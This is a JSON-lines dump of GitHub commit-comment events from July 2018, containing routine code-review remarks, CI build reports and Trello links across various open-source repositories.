{"id":"7984364949","type":"CommitCommentEvent","actor":{"login":"staabm"},"repo":{"name":"teamtnt/tntsearch"},"payload":{"comment":{"id":29753300,"position":4,"line":97,"path":"src/TNTFuzzyMatch.php","commit_id":"8447a36b016f51917592abc9f775e287e6a8ea93","created_at":"2018-07-18T17:22:22Z","updated_at":"2018-07-18T17:22:22Z","author_association":"NONE","body":"I guess you actually want `rtrim` instead"}},"created_at":"2018-07-18T17:22:22Z"}
{"id":"7984366662","type":"CommitCommentEvent","actor":{"login":"SRIKKANTH"},"repo":{"name":"RudraVidya/DBTestSuite"},"payload":{"comment":{"id":29753305,"position":3,"line":1,"path":"LinuxScripts/SampleScript.sh","commit_id":"a6ce3bdf0ef32eec62dc9bc88a600d0676f2b025","created_at":"2018-07-18T17:22:42Z","updated_at":"2018-07-18T17:22:42Z","author_association":"MEMBER","body":"These should be in \"LinuxScripts/InstallInfluxRepo.sh\" not here. Please move them there."}},"created_at":"2018-07-18T17:22:42Z"}
{"id":"7984375187","type":"CommitCommentEvent","actor":{"login":"mew-bot"},"repo":{"name":"MyEtherWallet/MyEtherWallet"},"payload":{"comment":{"id":29753316,"position":null,"line":null,"path":null,"commit_id":"a2c25145393bf77e0b8ae3efe887f726ab15d927","created_at":"2018-07-18T17:24:26Z","updated_at":"2018-07-18T17:24:26Z","author_association":"NONE","body":"Copy of this build can be found at https://www.mewbuilds.com/build/a2c25145393bf77e0b8ae3efe887f726ab15d927/index.html"}},"created_at":"2018-07-18T17:24:26Z"}
{"id":"7984399564","type":"CommitCommentEvent","actor":{"login":"basil-conto"},"repo":{"name":"abo-abo/swiper"},"payload":{"comment":{"id":29753371,"position":39,"line":2997,"path":"ivy.el","commit_id":"93d51d6188956da2592c1458b68d7cef48d967ae","created_at":"2018-07-18T17:29:18Z","updated_at":"2018-07-18T17:29:18Z","author_association":"CONTRIBUTOR","body":"Should `ivy-alist-setting` be fixed accordingly, or should it be avoided here? I vote the former."}},"created_at":"2018-07-18T17:29:18Z"}
{"id":"7984400604","type":"CommitCommentEvent","actor":{"login":"VadimKulagin"},"repo":{"name":"VadimKulagin/hello-world"},"payload":{"comment":{"id":29753376,"position":null,"line":null,"path":null,"commit_id":"f8b67ef03854e65b67a4ea2ebeac87f1fd21b2a3","created_at":"2018-07-18T17:29:31Z","updated_at":"2018-07-18T17:29:31Z","author_association":"OWNER","body":"Test `comment`"}},"created_at":"2018-07-18T17:29:31Z"}
{"id":"7984402913","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753379,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:29:58Z","updated_at":"2018-07-18T17:29:58Z","author_association":"MEMBER","body":"Will the collection of defining attributes always have the same sequence? I don't know how the API orders them. It might be worth it to try saving this collection as a list in a separate variable before the loop, and then ordering the a schema attributes by their name or db id. If the API somehow returns them in a different order now and then, I think it might affect how the key gets built."}},"created_at":"2018-07-18T17:29:58Z"}
{"id":"7984402977","type":"CommitCommentEvent","actor":{"login":"ondreian"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29753380,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T17:29:58Z","updated_at":"2018-07-18T17:29:58Z","author_association":"NONE","body":"I wasn't spending anytime at all personally,  and solely watch this repo because i have a few internal projects using Crystal & Kemal, and just wanted to point out that there already exists a utility for verifying the validity a version in core, and simply thought it might save all you excellent contributors some headache."}},"created_at":"2018-07-18T17:29:58Z"}
{"id":"7984405245","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29753389,"position":457,"line":457,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T17:30:25Z","updated_at":"2018-07-18T17:30:25Z","author_association":"OWNER","body":"> What do you mean by 'again'. The segs array should be filled only once by the parent tag?\r\n\r\nBad wording. `bounce_bus_dmamap_load_buffer()` calls `_bus_dmamap_reserve_pages()` ([busdma_bounce.c:712](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L712)). If there is a shortage, `_bus_dmamap_reserve_pages()` returns `EINPROGRESS` and the map is put on a waiting list.\r\n\r\nWhen the shortage is over, the entire process is done again. `busdma_swi()` calls `bus_dmamap_load_mem()` ([busdma_bounce.c:1292](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L1292)), which in turn starts the load process all over again ([subr_bus_dma.c:501](https://github.com/freebsd/freebsd/blob/master/sys/kern/subr_bus_dma.c#L501)).\r\n\r\nThis is what I mean by again.\r\n\r\n> Hm, no, I don't think so. Another load will allocate a new segs array, and the previous one will be left in temp_segs.\r\n\r\nA load does *not* allocate a new segs array. It uses the segs array tag->segments, unless the client specifies a segs array, in which case that array is filled (subr_bus_dma does not provide a segs array. It simply passes NULL to indicate that the tag's array should be used). A new segs array for each map is not allocated in any case. The segs array belongs to the tag, not the map. Check [busdma_bounce.c:76](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L76), [busdma_bounce.c:707](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L707), [busdma_bounce:296](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L296), [busdma_bounce.c:914](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L914).\r\n\r\n> Also, if the client is not supposed to try to issue concurrent loads using the same tag, why are we doing all this? Isn't it enough to just store whatever segs array the parent tag returns and keep that until the load is finished?\r\n>\r\n> The client issuing another load while this is still being processed is not supported as you say above.\r\n\r\nThe client is not supposed to issue a load while another load is being \"processed\". What that means is, until `bus_dmamap_load()` does not return, another load should not be issued. But, if a load returns `EINPROGRESS`, another load can be called while the previous load is waiting for resources. It is possible for the latter load to succeed if it needs less resources. Also note that `bus_dmamap_load()` never sleeps, it either succeeds, returns an error, or returns `EINPROGRESS` which indicates the load will be completed from a deferred context.\r\n\r\nThe bottom line is, the segs array *can* be over-written."}},"created_at":"2018-07-18T17:30:25Z"}
{"id":"7984407456","type":"CommitCommentEvent","actor":{"login":"nticaric"},"repo":{"name":"teamtnt/tntsearch"},"payload":{"comment":{"id":29753397,"position":4,"line":97,"path":"src/TNTFuzzyMatch.php","commit_id":"8447a36b016f51917592abc9f775e287e6a8ea93","created_at":"2018-07-18T17:30:52Z","updated_at":"2018-07-18T17:30:52Z","author_association":"CONTRIBUTOR","body":"feel free to submit a PR"}},"created_at":"2018-07-18T17:30:52Z"}
{"id":"7984407774","type":"CommitCommentEvent","actor":{"login":"cpstdhs"},"repo":{"name":"cpstdhs/pcap_test"},"payload":{"comment":{"id":29753399,"position":41,"line":41,"path":"ass.cpp","commit_id":"8722acf2947b8a0ea29d65fae5d0d1cd7bdee1d2","created_at":"2018-07-18T17:30:56Z","updated_at":"2018-07-18T17:30:56Z","author_association":"OWNER","body":"패킷을 관찰하던 중 IP Header가 존재하지 않으면 TCP Header도 존재하지 않는다고 판단하여 IP Header의 Checksum으로 Control Flow를 구성하였습니다."}},"created_at":"2018-07-18T17:30:56Z"}
{"id":"7984408219","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753402,"position":70,"line":122,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:31:02Z","updated_at":"2018-07-18T17:31:02Z","author_association":"MEMBER","body":"This collection should also be sorted somehow, to ensure that the keys are generated the same way each and every time."}},"created_at":"2018-07-18T17:31:02Z"}
{"id":"7984413698","type":"CommitCommentEvent","actor":{"login":"szymczdm"},"repo":{"name":"JacquesCarette/Drasil"},"payload":{"comment":{"id":29753411,"position":16,"line":62,"path":"code/drasil-docLang/Drasil/DocumentLanguage/Definitions.hs","commit_id":"1ac44586e3088e138c4bed83f1f5fa2bf385372b","created_at":"2018-07-18T17:32:08Z","updated_at":"2018-07-18T17:32:08Z","author_association":"COLLABORATOR","body":"Sounds good. Then our look-ups will still work as required."}},"created_at":"2018-07-18T17:32:08Z"}
{"id":"7984414188","type":"CommitCommentEvent","actor":{"login":"rolo1313"},"repo":{"name":"lisamich3ll3/test"},"payload":{"comment":{"id":29753413,"position":null,"line":null,"path":null,"commit_id":"63413f419d5086dc9046039727eab186059c9904","created_at":"2018-07-18T17:32:14Z","updated_at":"2018-07-18T17:32:14Z","author_association":"COLLABORATOR","body":"It"}},"created_at":"2018-07-18T17:32:14Z"}
{"id":"7984414386","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29753415,"position":null,"line":null,"path":null,"commit_id":"2d029a9105e631b293db1cc4d3b6c052b5769b82","created_at":"2018-07-18T17:32:16Z","updated_at":"2018-07-18T17:32:16Z","author_association":"NONE","body":"#6842-WrongTempUsedInCalcRadSysHXEffectTerm (Myoldmopar) - x86_64-MacOS-10.9-clang: OK (2942 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-2d029a9105e631b293db1cc4d3b6c052b5769b82-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-18T17:32:16Z"}
{"id":"7984415434","type":"CommitCommentEvent","actor":{"login":"bgarrick"},"repo":{"name":"gSchool/pull-request-mckesson"},"payload":{"comment":{"id":29753417,"position":null,"line":null,"path":null,"commit_id":"ff6102a9a2e8dd904a5a09d4292594436c76937d","created_at":"2018-07-18T17:32:29Z","updated_at":"2018-07-18T17:32:29Z","author_association":"NONE","body":"all done"}},"created_at":"2018-07-18T17:32:29Z"}
{"id":"7984416183","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753418,"position":78,"line":130,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:32:38Z","updated_at":"2018-07-18T17:32:38Z","author_association":"MEMBER","body":"Why is whitespace stripped out here? Is it possible that two objects might be almost identical, except for whitespace in one attribute?"}},"created_at":"2018-07-18T17:32:38Z"}
{"id":"7984416908","type":"CommitCommentEvent","actor":{"login":"aniqurrehman"},"repo":{"name":"Xilinx/PYNQ-Networking"},"payload":{"comment":{"id":29753420,"position":null,"line":null,"path":null,"commit_id":"ac33b1ff7ff6159fbf92241227beb8ad06a7778a","created_at":"2018-07-18T17:32:47Z","updated_at":"2018-07-18T17:32:47Z","author_association":"NONE","body":"PYNQ image 2.1"}},"created_at":"2018-07-18T17:32:47Z"}
{"id":"7984417839","type":"CommitCommentEvent","actor":{"login":"lisamich3ll3"},"repo":{"name":"lisamich3ll3/test"},"payload":{"comment":{"id":29753424,"position":null,"line":null,"path":null,"commit_id":"63413f419d5086dc9046039727eab186059c9904","created_at":"2018-07-18T17:32:59Z","updated_at":"2018-07-18T17:32:59Z","author_association":"OWNER","body":"YES"}},"created_at":"2018-07-18T17:32:59Z"}
{"id":"7984420876","type":"CommitCommentEvent","actor":{"login":"sdogruyol"},"repo":{"name":"kemalcr/kemal"},"payload":{"comment":{"id":29753431,"position":null,"line":null,"path":null,"commit_id":"09bb1fcd4073a374b3a61c99e48e05a866b23c08","created_at":"2018-07-18T17:33:37Z","updated_at":"2018-07-18T17:33:37Z","author_association":"MEMBER","body":"Oh god..I'm on a business trip and really shocked to see this much bikeshedding going on for this...if we don't like it or it breaks..we can just revert it"}},"created_at":"2018-07-18T17:33:37Z"}
{"id":"7984421933","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753434,"position":null,"line":null,"path":null,"commit_id":"8dbb5d63bd932aba8244bd1c0e8149d1ffba4e90","created_at":"2018-07-18T17:33:49Z","updated_at":"2018-07-18T17:33:49Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:33:49Z"}
{"id":"7984424124","type":"CommitCommentEvent","actor":{"login":"Tomi1986"},"repo":{"name":"Tomi1986/Heinekem"},"payload":{"comment":{"id":29753441,"position":null,"line":null,"path":null,"commit_id":"5162ee3a0124498a71fedbb705c8bab9ea887457","created_at":"2018-07-18T17:34:16Z","updated_at":"2018-07-18T17:34:16Z","author_association":"OWNER","body":"git commit -m \"Refactor használhatósági tesztek.\r\nhttps://github.com/Tomi1986/Heinekem/commits?author=Tomi198\r\nhttps://github.com/Tomi1986/Heinekem/commit/5162ee3a0124498a71fedbb705c8bab9ea887457#diff-04c6e90faac2675aa89e2176d2eec7d86 \r\n\r\ngit commit -m \"Refactor használhatósági tesztek.\r\n\r\nElnézést kérek a cselekedetemért..Nem megy nekem sokat kell még tanulni..Bocsánat"}},"created_at":"2018-07-18T17:34:16Z"}
{"id":"7984425514","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753447,"position":null,"line":null,"path":null,"commit_id":"8dbb5d63bd932aba8244bd1c0e8149d1ffba4e90","created_at":"2018-07-18T17:34:34Z","updated_at":"2018-07-18T17:34:34Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:34:34Z"}
{"id":"7984427290","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753454,"position":null,"line":null,"path":null,"commit_id":"a25020d654c12d84600bff3adb1a0a1ba890f2c7","created_at":"2018-07-18T17:34:56Z","updated_at":"2018-07-18T17:34:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:34:56Z"}
{"id":"7984427319","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753458,"position":null,"line":null,"path":null,"commit_id":"36907c24e0bf4122860617d9d81dd3c82b665fa3","created_at":"2018-07-18T17:34:56Z","updated_at":"2018-07-18T17:34:56Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:34:56Z"}
{"id":"7984428034","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753460,"position":null,"line":null,"path":null,"commit_id":"f3bf68cf59e734be34da985807fd02e6833bb6d2","created_at":"2018-07-18T17:35:06Z","updated_at":"2018-07-18T17:35:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:35:06Z"}
{"id":"7984428043","type":"CommitCommentEvent","actor":{"login":"Skidragon"},"repo":{"name":"Skidragon/front-end-project-week"},"payload":{"comment":{"id":29753461,"position":null,"line":null,"path":null,"commit_id":"5d7aed25734741b64c2dd9e8f9440c87e4fabc3c","created_at":"2018-07-18T17:35:06Z","updated_at":"2018-07-18T17:35:06Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Allow editing of an existing note](https://trello.com/c/fnOUfg0O/8-allow-editing-of-an-existing-note)"}},"created_at":"2018-07-18T17:35:06Z"}
{"id":"7984433156","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753466,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:36:08Z","updated_at":"2018-07-18T17:36:08Z","author_association":"CONTRIBUTOR","body":"It seemed that each time the defining attributes were pulled out in the same order but your right, it would make sense to order them alphabetically so that if that ever stopped we were still getting the same keys"}},"created_at":"2018-07-18T17:36:08Z"}
{"id":"7984433672","type":"CommitCommentEvent","actor":{"login":"stipsan"},"repo":{"name":"catamphetamine/react-responsive-ui"},"payload":{"comment":{"id":29753467,"position":32,"line":280,"path":"source/Expandable.js","commit_id":"2749fcd6c1637f4093031cc0a6786c39f2ac0142","created_at":"2018-07-18T17:36:13Z","updated_at":"2018-07-18T17:36:13Z","author_association":"NONE","body":"ok 😄 Great to hear you like the new version btw 🎉  "}},"created_at":"2018-07-18T17:36:13Z"}
{"id":"7984436665","type":"CommitCommentEvent","actor":{"login":"luncht1me"},"repo":{"name":"peppage/go-twitter"},"payload":{"comment":{"id":29753471,"position":null,"line":null,"path":null,"commit_id":"48e5f4997f15673a2bd6f1f50184d04080f055de","created_at":"2018-07-18T17:36:47Z","updated_at":"2018-07-18T17:36:47Z","author_association":"NONE","body":"Thanks for this branch! Even though it's not pulled into the main repo yet, I'm able to make use of it :) Lists are very important!"}},"created_at":"2018-07-18T17:36:47Z"}
{"id":"7984436795","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29753472,"position":15,"line":15,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-18T17:36:49Z","updated_at":"2018-07-18T17:36:49Z","author_association":"NONE","body":"Ah, no, I was just thinking a Rust enum. I can't decide if it would be annoying or comforting to have an enum of all the jobs you can enqueue or not..."}},"created_at":"2018-07-18T17:36:49Z"}
{"id":"7984437065","type":"CommitCommentEvent","actor":{"login":"seansan"},"repo":{"name":"OpenMage/magento-lts"},"payload":{"comment":{"id":29753473,"position":null,"line":null,"path":null,"commit_id":"afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3","created_at":"2018-07-18T17:36:52Z","updated_at":"2018-07-18T17:36:52Z","author_association":"CONTRIBUTOR","body":"​​\nGuys may I jump in? I think all maintainers try to do their best and spend\ntheir precious time here. Lets bring up the positive in each other this\nalways works best long term for all parties.\n\n​This does not mean a good discussion is possible ;)\n\n​\n\n\n\nOn Wed, Jul 18, 2018 at 3:16 PM Erik Dannenberg <notifications@github.com>\nwrote:\n\n> So basically you don't care that pretty much all other maintainers made an\n> effort to improve git discipline over the course of this year, because you\n> prefer easy over proper?\n>\n> —\n> You are receiving this because you are subscribed to this thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/OpenMage/magento-lts/commit/afc58e89714d5ec3c7a24b4af571bc3d4d66f0e3#commitcomment-29749515>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AAn0a2TyvDnCcOEY-a6so7Sln1xGD5vbks5uHzVBgaJpZM4VS3n4>\n> .\n>\n"}},"created_at":"2018-07-18T17:36:52Z"}
{"id":"7984439760","type":"CommitCommentEvent","actor":{"login":"CatherineDelisle"},"repo":{"name":"CatherineDelisle/test"},"payload":{"comment":{"id":29753485,"position":4,"line":1,"path":"Hangman","commit_id":"9c52db8bc5cb48a8087b4a1eb24c3b69509c3eb6","created_at":"2018-07-18T17:37:25Z","updated_at":"2018-07-18T17:37:25Z","author_association":"OWNER","body":"Trying to re-add "}},"created_at":"2018-07-18T17:37:25Z"}
{"id":"7984440779","type":"CommitCommentEvent","actor":{"login":"carols10cents"},"repo":{"name":"sgrif/crates.io"},"payload":{"comment":{"id":29753488,"position":74,"line":74,"path":"src/job.rs","commit_id":"de9d9bf2aa177b64133ad7b1027616cfe5b458f5","created_at":"2018-07-18T17:37:37Z","updated_at":"2018-07-18T17:37:37Z","author_association":"NONE","body":"Ok, that makes more sense. Thanks!"}},"created_at":"2018-07-18T17:37:37Z"}
{"id":"7984441679","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753490,"position":27,"line":45,"path":"mod/book/db/upgrade.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:37:46Z","updated_at":"2018-07-18T17:37:46Z","author_association":"MEMBER","body":"Why were these markers removed?"}},"created_at":"2018-07-18T17:37:46Z"}
{"id":"7984442775","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753497,"position":9,"line":36,"path":"mod/book/db/upgrade.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:37:59Z","updated_at":"2018-07-18T17:37:59Z","author_association":"MEMBER","body":"Why was this marker removed?"}},"created_at":"2018-07-18T17:37:59Z"}
{"id":"7984442949","type":"CommitCommentEvent","actor":{"login":"cookersjs"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753498,"position":78,"line":130,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:38:01Z","updated_at":"2018-07-18T17:38:01Z","author_association":"CONTRIBUTOR","body":"The one that was coming up at this location was the name attribute, and it was my personal preference that the keys be a continuous string of characters"}},"created_at":"2018-07-18T17:38:01Z"}
{"id":"7984445809","type":"CommitCommentEvent","actor":{"login":"lisamich3ll3"},"repo":{"name":"rolo1313/July-18-2018"},"payload":{"comment":{"id":29753502,"position":null,"line":null,"path":null,"commit_id":"12754c84d54b4fd89f3cddc43164d074cfc202d2","created_at":"2018-07-18T17:38:33Z","updated_at":"2018-07-18T17:38:33Z","author_association":"COLLABORATOR","body":"THE \r\nA"}},"created_at":"2018-07-18T17:38:33Z"}
{"id":"7984445855","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753503,"position":14,"line":545,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:38:33Z","updated_at":"2018-07-18T17:38:33Z","author_association":"MEMBER","body":"This function needs prefixing with the component name to ensure it doesn't conflict with others in the global scope (e.g. `mod_book_check_progress`"}},"created_at":"2018-07-18T17:38:33Z"}
{"id":"7984448645","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753509,"position":29,"line":560,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:39:06Z","updated_at":"2018-07-18T17:39:06Z","author_association":"MEMBER","body":"As above, prefix this function name with the component name."}},"created_at":"2018-07-18T17:39:06Z"}
{"id":"7984452366","type":"CommitCommentEvent","actor":{"login":"chapdbr"},"repo":{"name":"EtienneTetreault/hello-world"},"payload":{"comment":{"id":29753521,"position":null,"line":null,"path":null,"commit_id":"c64385c48375f41bf70abc455225bb81d05a2a11","created_at":"2018-07-18T17:39:50Z","updated_at":"2018-07-18T17:39:50Z","author_association":"NONE","body":"Es-tu sûr que tu t'en souviens?"}},"created_at":"2018-07-18T17:39:50Z"}
{"id":"7984452455","type":"CommitCommentEvent","actor":{"login":"carver"},"repo":{"name":"ethereum/py-evm"},"payload":{"comment":{"id":29753523,"position":50,"line":50,"path":"docs/guides/eth/building_an_app_that_uses_pyevm.rst","commit_id":"01527b274b091370e0a6e9ced276ce814f14c2fb","created_at":"2018-07-18T17:39:51Z","updated_at":"2018-07-18T17:39:51Z","author_association":"CONTRIBUTOR","body":"Maybe also point people to the https://github.com/carver/ethereum-python-project-template/blob/master/.project-template/fill_template_vars.sh script to fill the module name (and other variables) everywhere."}},"created_at":"2018-07-18T17:39:51Z"}
{"id":"7984453345","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753526,"position":60,"line":591,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:40:01Z","updated_at":"2018-07-18T17:40:01Z","author_association":"MEMBER","body":"Since this function generates markup, is there a reason it's not in `mod_book_renderer`? As it stands it's not possible for themes to override the markup generated here."}},"created_at":"2018-07-18T17:40:01Z"}
{"id":"7984455028","type":"CommitCommentEvent","actor":{"login":"SolomonShorser-OICR"},"repo":{"name":"reactome/data-release-pipeline"},"payload":{"comment":{"id":29753529,"position":63,"line":115,"path":"orthoinference/src/main/java/org/reactome/orthoinference/GenerateInstance.java","commit_id":"885679f732dcd94284e3afd13bfda6140f79f1f7","created_at":"2018-07-18T17:40:20Z","updated_at":"2018-07-18T17:40:20Z","author_association":"MEMBER","body":"You *could* also dive into the API code to see how it assembles these lists and collections (I haven't done that recently, which is why I can't remember if the order is defined or not)... But I think generally it's a good idea to make sure you know that the order will always be the same. Another question: If the order changed, how would you know? Would your code alert you to the attributes being in a different order than last time? \r\nYou could also write a unit test that calls the getCacheKey on the same thing many many times (hundreds? thousands?) and fails if the returned key ever differs from the rest.\r\n*Another* option is to make the key a *map* of values, rather than a string of concatenated values. This is probably not necessary in this case, but if the key were a map, then the sorting the inputs for making the key wouldn't matter so much."}},"created_at":"2018-07-18T17:40:20Z"}
{"id":"7984455176","type":"CommitCommentEvent","actor":{"login":"masc4ii"},"repo":{"name":"ilia3101/MLV-App"},"payload":{"comment":{"id":29753530,"position":null,"line":null,"path":null,"commit_id":"043101c15f5b89f5a8b30219abaeaef5cb7456b9","created_at":"2018-07-18T17:40:22Z","updated_at":"2018-07-18T17:40:22Z","author_association":"COLLABORATOR","body":"The result is better than nothing... but full CPU on all cores for minutes... hahahaha."}},"created_at":"2018-07-18T17:40:22Z"}
{"id":"7984455746","type":"CommitCommentEvent","actor":{"login":"JohnnySanttana72"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29753533,"position":null,"line":null,"path":null,"commit_id":"744af3841322cacbe52f71e5df45b7850a9f4f36","created_at":"2018-07-18T17:40:28Z","updated_at":"2018-07-18T17:40:28Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Realizar Backup programado](https://trello.com/c/FNJkHQzD/215-realizar-backup-programado)"}},"created_at":"2018-07-18T17:40:28Z"}
{"id":"7984457487","type":"CommitCommentEvent","actor":{"login":"EtienneTetreault"},"repo":{"name":"EtienneTetreault/hello-world"},"payload":{"comment":{"id":29753536,"position":null,"line":null,"path":null,"commit_id":"c64385c48375f41bf70abc455225bb81d05a2a11","created_at":"2018-07-18T17:40:48Z","updated_at":"2018-07-18T17:40:48Z","author_association":"OWNER","body":"wtf dude !?!\n\nOn 18 July 2018 at 13:39, Bruno Chapdelaine <notifications@github.com>\nwrote:\n\n> Es-tu sûr que tu t'en souviens?\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/EtienneTetreault/hello-world/commit/c64385c48375f41bf70abc455225bb81d05a2a11#commitcomment-29753521>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AeBejN1CLYQgaGjY7DCXFizCHIouedXeks5uH3LmgaJpZM4VVBM3>\n> .\n>\n"}},"created_at":"2018-07-18T17:40:48Z"}
{"id":"7984457758","type":"CommitCommentEvent","actor":{"login":"DanaMW"},"repo":{"name":"DanaMW/Download-Synthesis-Aria2"},"payload":{"comment":{"id":29753537,"position":null,"line":null,"path":null,"commit_id":"3127daa2ca8c2653d4ca90fa7642f78d1532270d","created_at":"2018-07-18T17:40:52Z","updated_at":"2018-07-18T17:40:52Z","author_association":"OWNER","body":"in she goes"}},"created_at":"2018-07-18T17:40:52Z"}
{"id":"7984460772","type":"CommitCommentEvent","actor":{"login":"LukeCarrier"},"repo":{"name":"AVADOLearning/moodle"},"payload":{"comment":{"id":29753550,"position":52,"line":583,"path":"mod/book/locallib.php","commit_id":"5e4c13857432d36fc099297dff864ead8a363fb2","created_at":"2018-07-18T17:41:28Z","updated_at":"2018-07-18T17:41:28Z","author_association":"MEMBER","body":"When using `moodle_url` for URLs with GET parameters, use the `$params` argument for them, e.g.\r\n\r\n```php\r\n$chapterurl = new moodle_url('/mod/book/view.php', [\r\n    'id' => $cmid,\r\n    'chapterid' => $currentchapter->chapterid,\r\n]);\r\n```"}},"created_at":"2018-07-18T17:41:28Z"}
